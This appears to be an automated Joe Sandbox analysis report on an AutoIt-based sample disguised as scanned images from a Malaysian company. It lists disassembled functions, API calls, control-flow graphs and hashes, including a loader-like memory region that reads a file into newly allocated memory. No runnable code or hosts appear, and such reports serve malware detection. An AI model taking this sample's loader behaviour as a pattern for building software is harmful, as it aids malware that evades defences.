                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                        • API String ID: 4003667617-3242690629
                                                        • Opcode ID: 550b47237aae281d2f1061e6d12b66890708f39f6d33e74bc573916bf4398789
                                                        • Instruction ID: abc80b31490738d5d5cfebee21aecf596b372c29c29b1b5dd0927ce817779159
                                                        • Opcode Fuzzy Hash: 550b47237aae281d2f1061e6d12b66890708f39f6d33e74bc573916bf4398789
                                                        • Instruction Fuzzy Hash: A6B2AE70A08741DFD728DF24C994BAAB7F5BF85304F14492DF58A872A1DB71E885CB82

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00A891E9: __time64.LIBCMT ref: 00A891F3
                                                          • Part of subcall function 00A25045: _fseek.LIBCMT ref: 00A2505D
                                                        • __wsplitpath.LIBCMT ref: 00A894BE
                                                          • Part of subcall function 00A4432E: __wsplitpath_helper.LIBCMT ref: 00A4436E
                                                        • _wcscpy.LIBCMT ref: 00A894D1
                                                        • _wcscat.LIBCMT ref: 00A894E4
                                                        • __wsplitpath.LIBCMT ref: 00A89509
                                                        • _wcscat.LIBCMT ref: 00A8951F
                                                        • _wcscat.LIBCMT ref: 00A89532
                                                          • Part of subcall function 00A8922F: _memmove.LIBCMT ref: 00A89268
                                                          • Part of subcall function 00A8922F: _memmove.LIBCMT ref: 00A89277
                                                        • _wcscmp.LIBCMT ref: 00A89479
                                                          • Part of subcall function 00A899BE: _wcscmp.LIBCMT ref: 00A89AAE
                                                          • Part of subcall function 00A899BE: _wcscmp.LIBCMT ref: 00A89AC1
                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A896DC
                                                        • _wcsncpy.LIBCMT ref: 00A8974F
                                                        • DeleteFileW.KERNEL32(?,?), ref: 00A89785
                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A8979B
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A897AC
                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A897BE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                        • String ID:
                                                        • API String ID: 1500180987-0
                                                        • Opcode ID: 0df842b29718ca439b22689e5bf91c5b2ed6876d989adf45b7e321fffde23e12
                                                        • Instruction ID: da844c0fdbe4cadc87fd0dd283cc2fa42f6d0045a65e1fc9b01170a9941c7f9c
                                                        • Opcode Fuzzy Hash: 0df842b29718ca439b22689e5bf91c5b2ed6876d989adf45b7e321fffde23e12
                                                        • Instruction Fuzzy Hash: ECC12FB1D00129AEDF21EFA5CD85AEFB7BDEF45300F0440AAF609E6151EB709A448F65

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00A23074
                                                        • RegisterClassExW.USER32(00000030), ref: 00A2309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A230AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00A230CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A230DC
                                                        • LoadIconW.USER32(000000A9), ref: 00A230F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A23101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: 569f2acbe7806bf385e6e7bd12e90c77a74fc79bd9adbeaaba14a971745a1d8d
                                                        • Instruction ID: 2c9f7543ae50696c553bd341ac7edf794902d117649b6cb3927d0a33440b28bb
                                                        • Opcode Fuzzy Hash: 569f2acbe7806bf385e6e7bd12e90c77a74fc79bd9adbeaaba14a971745a1d8d
                                                        • Instruction Fuzzy Hash: 6E312AB1941349EFDB50DFE4E885BDDBBF0FB19350F10492AE590AA2A0D3B50582CF50

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00A23074
                                                        • RegisterClassExW.USER32(00000030), ref: 00A2309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A230AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00A230CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A230DC
                                                        • LoadIconW.USER32(000000A9), ref: 00A230F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A23101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: ce0301a560dcc227ee97793eafa4b174a35fc0361d503641ebadba2cc67aae20
                                                        • Instruction ID: 746d4e8ca1c834ab2bb01ab11abccceda25342803bf1d3b8c6e763c81db2bc6a
                                                        • Opcode Fuzzy Hash: ce0301a560dcc227ee97793eafa4b174a35fc0361d503641ebadba2cc67aae20
                                                        • Instruction Fuzzy Hash: 7E21C3B1D00259AFDB10DFE4E889BDDBBF4FB19750F00452AFA10AA2A0D7B145468F95

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00A24864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00AE62F8,?,00A237C0,?), ref: 00A24882
                                                          • Part of subcall function 00A4074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00A272C5), ref: 00A40771
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A27308
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A5ECF1
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A5ED32
                                                        • RegCloseKey.ADVAPI32(?), ref: 00A5ED70
                                                        • _wcscat.LIBCMT ref: 00A5EDC9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                        • API String ID: 2673923337-2727554177
                                                        • Opcode ID: 053a23dc6932b11406cf24d7494efedb336c4612f34f5c417cd095d8e4cc6d32
                                                        • Instruction ID: 4ff421ea5e3277ffcba03db146de8fb7ea5ab135a277cec6d6095ce24019b39f
                                                        • Opcode Fuzzy Hash: 053a23dc6932b11406cf24d7494efedb336c4612f34f5c417cd095d8e4cc6d32
                                                        • Instruction Fuzzy Hash: 7B716F714083419EC714DFA9ED8199FBBF8FF95340B84092EF5459B1A0EB309A4ACB62

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00A23A62
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00A23A71
                                                        • LoadIconW.USER32(00000063), ref: 00A23A88
                                                        • LoadIconW.USER32(000000A4), ref: 00A23A9A
                                                        • LoadIconW.USER32(000000A2), ref: 00A23AAC
                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A23AD2
                                                        • RegisterClassExW.USER32(?), ref: 00A23B28
                                                          • Part of subcall function 00A23041: GetSysColorBrush.USER32(0000000F), ref: 00A23074
                                                          • Part of subcall function 00A23041: RegisterClassExW.USER32(00000030), ref: 00A2309E
                                                          • Part of subcall function 00A23041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A230AF
                                                          • Part of subcall function 00A23041: InitCommonControlsEx.COMCTL32(?), ref: 00A230CC
                                                          • Part of subcall function 00A23041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A230DC
                                                          • Part of subcall function 00A23041: LoadIconW.USER32(000000A9), ref: 00A230F2
                                                          • Part of subcall function 00A23041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A23101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
                                                        • Opcode ID: 99795b771dee407297bda1b830b16b079fa0ce7ccba4fcb95905000b2863b73a
                                                        • Instruction ID: 671c0428a691f3cb883234a05e91922a54ae1196a66c3016979f6db1305f8faf
                                                        • Opcode Fuzzy Hash: 99795b771dee407297bda1b830b16b079fa0ce7ccba4fcb95905000b2863b73a
                                                        • Instruction Fuzzy Hash: BF214DB1D00354AFDB10DFE4EC89BDD7BB4FB18751F004529E604AA2E0D3B655568F54

                                                        Control-flow Graph

                                                        control_flow_graph 767 a23633-a23681 769 a23683-a23686 767->769 770 a236e1-a236e3 767->770 772 a236e7 769->772 773 a23688-a2368f 769->773 770->769 771 a236e5 770->771 774 a236ca-a236d2 DefWindowProcW 771->774 775 a5d31c-a5d34a call a311d0 call a311f3 772->775 776 a236ed-a236f0 772->776 777 a23695-a2369a 773->777 778 a2375d-a23765 PostQuitMessage 773->778 785 a236d8-a236de 774->785 814 a5d34f-a5d356 775->814 780 a236f2-a236f3 776->780 781 a23715-a2373c SetTimer RegisterWindowMessageW 776->781 782 a236a0-a236a2 777->782 783 a5d38f-a5d3a3 call a82a16 777->783 779 a23711-a23713 778->779 779->785 786 a5d2bf-a5d2c2 780->786 787 a236f9-a2370c KillTimer call a244cb call a23114 780->787 781->779 788 a2373e-a23749 CreatePopupMenu 781->788 789 a23767-a23776 call a24531 782->789 790 a236a8-a236ad 782->790 783->779 808 a5d3a9 783->808 794 a5d2c4-a5d2c6 786->794 795 a5d2f8-a5d317 MoveWindow 786->795 787->779 788->779 789->779 797 a5d374-a5d37b 790->797 798 a236b3-a236b8 790->798 802 a5d2e7-a5d2f3 SetFocus 794->802 803 a5d2c8-a5d2cb 794->803 795->779 797->774 805 a5d381-a5d38a call a7817e 797->805 806 a2374b-a2375b call a245df 798->806 807 a236be-a236c4 798->807 802->779 803->807 810 a5d2d1-a5d2e2 call a311d0 803->810 805->774 806->779 807->774 807->814 808->774 810->779 814->774 815 a5d35c-a5d36f call a244cb call a243db 814->815 815->774
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00A236D2
                                                        • KillTimer.USER32(?,00000001), ref: 00A236FC
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A2371F
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A2372A
                                                        • CreatePopupMenu.USER32 ref: 00A2373E
                                                        • PostQuitMessage.USER32(00000000), ref: 00A2375F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated
                                                        • API String ID: 129472671-2362178303
                                                        • Opcode ID: 751d0ed28d0b3c641a9754f3b968f04a7b552ec6efa30da5fadff34d0d623110
                                                        • Instruction ID: fe4ac15de6be60cc559b7083bd794dfc0279537bb69c5b02ea3bc8aa24c579bc
                                                        • Opcode Fuzzy Hash: 751d0ed28d0b3c641a9754f3b968f04a7b552ec6efa30da5fadff34d0d623110
                                                        • Instruction Fuzzy Hash: CF415DB3100155BBDF24DFACFC49BBA3768EB16340F040939FA428A2E1DB799D029761

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                        • API String ID: 1825951767-3513169116
                                                        • Opcode ID: 21875436901469cdbe8165d52ff49eaf7b79ed980fd77e2bf9e8823034393e01
                                                        • Instruction ID: 199d22e2ec42c7fdb09bb0cd108224a9c868f29aeee102ac0de082e883aee6e0
                                                        • Opcode Fuzzy Hash: 21875436901469cdbe8165d52ff49eaf7b79ed980fd77e2bf9e8823034393e01
                                                        • Instruction Fuzzy Hash: E1A16D72C10239AACF14EBA8ED92AEEB778BF15750F040539F412B7191DF349A09CB60

                                                        Control-flow Graph

                                                        control_flow_graph 942 16925e0-169268e call 1690000 945 1692695-16926bb call 16934f0 CreateFileW 942->945 948 16926bd 945->948 949 16926c2-16926d2 945->949 950 169280d-1692811 948->950 957 16926d9-16926f3 VirtualAlloc 949->957 958 16926d4 949->958 951 1692853-1692856 950->951 952 1692813-1692817 950->952 954 1692859-1692860 951->954 955 1692819-169281c 952->955 956 1692823-1692827 952->956 961 1692862-169286d 954->961 962 16928b5-16928ca 954->962 955->956 963 1692829-1692833 956->963 964 1692837-169283b 956->964 959 16926fa-1692711 ReadFile 957->959 960 16926f5 957->960 958->950 965 1692718-1692758 VirtualAlloc 959->965 966 1692713 959->966 960->950 967 169286f 961->967 968 1692871-169287d 961->968 969 16928da-16928e2 962->969 970 16928cc-16928d7 VirtualFree 962->970 963->964 971 169284b 964->971 972 169283d-1692847 964->972 973 169275a 965->973 974 169275f-169277a call 1693740 965->974 966->950 967->962 975 169287f-169288f 968->975 976 1692891-169289d 968->976 970->969 971->951 972->971 973->950 982 1692785-169278f 974->982 978 16928b3 975->978 979 16928aa-16928b0 976->979 980 169289f-16928a8 976->980 978->954 979->978 980->978 983 1692791-16927c0 call 1693740 982->983 984 16927c2-16927d6 call 1693550 982->984 983->982 989 16927d8 984->989 990 16927da-16927de 984->990 989->950 992 16927ea-16927ee 990->992 993 16927e0-16927e4 FindCloseChangeNotification 990->993 994 16927fe-1692807 992->994 995 16927f0-16927fb VirtualFree 992->995 993->992 994->945 994->950 995->994
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 016926B1
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 016928D7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1341240796.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1690000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                        • Instruction ID: 9598fa04688e0592dd3e0289954ed81fd3a630270851fba863ce6cb9a4b5cf4d
                                                        • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                        • Instruction Fuzzy Hash: CAA1E674E00209EBDF14DFA4C9A4BEEBBB9BF48304F20815DE501BB281D7759A45CB94

                                                        Control-flow Graph

                                                        control_flow_graph 1073 a239e7-a23a57 CreateWindowExW * 2 ShowWindow * 2
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A23A15
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A23A36
                                                        • ShowWindow.USER32(00000000,?,?), ref: 00A23A4A
                                                        • ShowWindow.USER32(00000000,?,?), ref: 00A23A53
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: acf408648f1ced78998f2ca791b644299ce0dfe436d3efb737121697bb2770a6
                                                        • Instruction ID: 5e662e199ce4ee76919059e4f12a4ba54532ab0ced9b3fcccebc00d99d99fc81
                                                        • Opcode Fuzzy Hash: acf408648f1ced78998f2ca791b644299ce0dfe436d3efb737121697bb2770a6
                                                        • Instruction Fuzzy Hash: 2EF03070A002D07EEA3097936C88EB73E7DD7D7FA0B000429BA00A61B0C2A51842CB70

                                                        Control-flow Graph

                                                        control_flow_graph 1074 16923b0-16924d8 call 1690000 call 16922a0 CreateFileW 1081 16924da 1074->1081 1082 16924df-16924ef 1074->1082 1083 169258f-1692594 1081->1083 1085 16924f1 1082->1085 1086 16924f6-1692510 VirtualAlloc 1082->1086 1085->1083 1087 1692512 1086->1087 1088 1692514-169252b ReadFile 1086->1088 1087->1083 1089 169252d 1088->1089 1090 169252f-1692569 call 16922e0 call 16912a0 1088->1090 1089->1083 1095 169256b-1692580 call 1692330 1090->1095 1096 1692585-169258d ExitProcess 1090->1096 1095->1096 1096->1083
                                                        APIs
                                                          • Part of subcall function 016922A0: Sleep.KERNELBASE(000001F4), ref: 016922B1
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 016924CE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1341240796.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1690000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: 81JNGYI70PUZT7Q5TUTIIB
                                                        • API String ID: 2694422964-4236348428
                                                        • Opcode ID: 74f2f45ebfff185a785d9a54a99a0eb52dc3ad378cbf1b433c3e3e1451dc5df5
                                                        • Instruction ID: a4ed28e640b72896388d5742b692917a0adea506ca5fb7bd2d0eb1bb85a213ec
                                                        • Opcode Fuzzy Hash: 74f2f45ebfff185a785d9a54a99a0eb52dc3ad378cbf1b433c3e3e1451dc5df5
                                                        • Instruction Fuzzy Hash: 65517F70D04289EBEF11DBA4CC64BEEBBB9AF15304F004199E6097B2C1D6B91B45CBA5

                                                        Control-flow Graph

                                                        control_flow_graph 1098 a2410d-a24123 1099 a24200-a24204 1098->1099 1100 a24129-a2413e call a27b76 1098->1100 1103 a24144-a24164 call a27d2c 1100->1103 1104 a5d5dd-a5d5ec LoadStringW 1100->1104 1106 a5d5f7-a5d60f call a27c8e call a27143 1103->1106 1109 a2416a-a2416e 1103->1109 1104->1106 1116 a2417e-a241fb call a43020 call a2463e call a42ffc Shell_NotifyIconW call a25a64 1106->1116 1120 a5d615-a5d633 call a27e0b call a27143 call a27e0b 1106->1120 1110 a24174-a24179 call a27c8e 1109->1110 1111 a24205-a2420e call a281a7 1109->1111 1110->1116 1111->1116 1116->1099 1120->1116
                                                        APIs
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A5D5EC
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                        • _memset.LIBCMT ref: 00A2418D
                                                        • _wcscpy.LIBCMT ref: 00A241E1
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A241F1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                        • String ID: Line:
                                                        • API String ID: 3942752672-1585850449
                                                        • Opcode ID: c624bcfecbc3726e1975111c627dc4469970c04cb3eef5e8514dd94daffee6be
                                                        • Instruction ID: 719ef68fc95678d8c6d499be4ccaddbca6b97b7336b09975443c44c2bb0c07be
                                                        • Opcode Fuzzy Hash: c624bcfecbc3726e1975111c627dc4469970c04cb3eef5e8514dd94daffee6be
                                                        • Instruction Fuzzy Hash: CE31F871408364AAD721EBA8ED46FDF77ECAF54300F104A2EF585960A1EB709749C793

                                                        Control-flow Graph

